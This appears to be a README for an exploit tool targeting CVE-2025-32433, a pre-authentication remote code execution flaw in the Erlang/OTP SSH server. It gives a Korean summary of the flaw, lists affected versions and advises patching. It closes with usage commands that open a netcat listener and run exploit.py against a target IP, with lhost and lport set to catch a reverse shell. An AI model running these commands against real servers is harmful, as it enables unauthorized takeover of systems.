
CVE-2025-32433 Summary and Attack Overview
CVE-2025-32433 요약 및 공격 개요
CVE-2025-32433은 2025년 4월 16일에 공개된 Erlang/OTP SSH 서버의 심각한 인증 없는 원격 코드 실행(RCE) 취약점입니다. Erlang/OTP SSH는 다양한 분산 및 통신 애플리케이션에서 사용되는 라이브러리입니다. 이 결함은 SSH 프로토콜 메시지를 부적절하게 처리하는 데서 발생합니다. 서버가 정상적인 인증 순서를 강제하지 못해, 공격자가 인증 이전에 특수하게 조작된 SSH 메시지를 보낼 수 있습니다. 이를 통해 공격자는 서버에서 임의의 Erlang 코드를 주입하고 실행할 수 있습니다 nvd.nist.gov offsec.com . 실질적으로, 이는 취약한 Erlang/OTP SSH 서버(종종 root 권한으로 실행됨)에 네트워크 접근이 가능한 공격자가 자격 증명 없이 리버스 셸을 트리거하거나 명령을 실행하여 전체 시스템을 장악할 수 있음을 의미합니다 nvd.nist.gov offsec.com . 이 취약점은 CVSS 점수 10.0(최대 심각도)으로 평가되었습니다 offsec.com .
영향을 받는 버전은 OTP-27.3.3, OTP-26.2.5.11 또는 OTP-25.3.2.20 미만의 모든 Erlang/OTP 릴리스입니다(패치된 버전) nvd.nist.gov offsec.com . 영향을 받는 시스템에는 Erlang 기반 SSH 데몬(OpenSSH와 혼동하지 말 것)을 실행하는 Linux 서버나 어플라이언스가 자주 포함됩니다. 중요한 점은 Linux/BSD의 기본 OpenSSH 서버는 취약하지 않다는 것입니다 offsec.com . 사용자는 노출된 모든 Erlang/OTP SSH 서버가 영향을 받는 것으로 간주하고, 공식 패치를 적용하거나 즉시 SSH 서비스를 비활성화해야 합니다.
공격은 SSH 연결을 시작한 후 SSH 메시지 시퀀스를 순서에 맞지 않게 전송하는 방식으로 작동합니다. :
사용법:
sudo chmod +x exploit.py
nc -nvlp
python3 exploit.py -t -p 22 --lhost --lport
예:
nc -nvlp 5555
python3 exploit.py -t 10.10.22.111 -p 22 --lhost 10.12.33.111 --lport 55555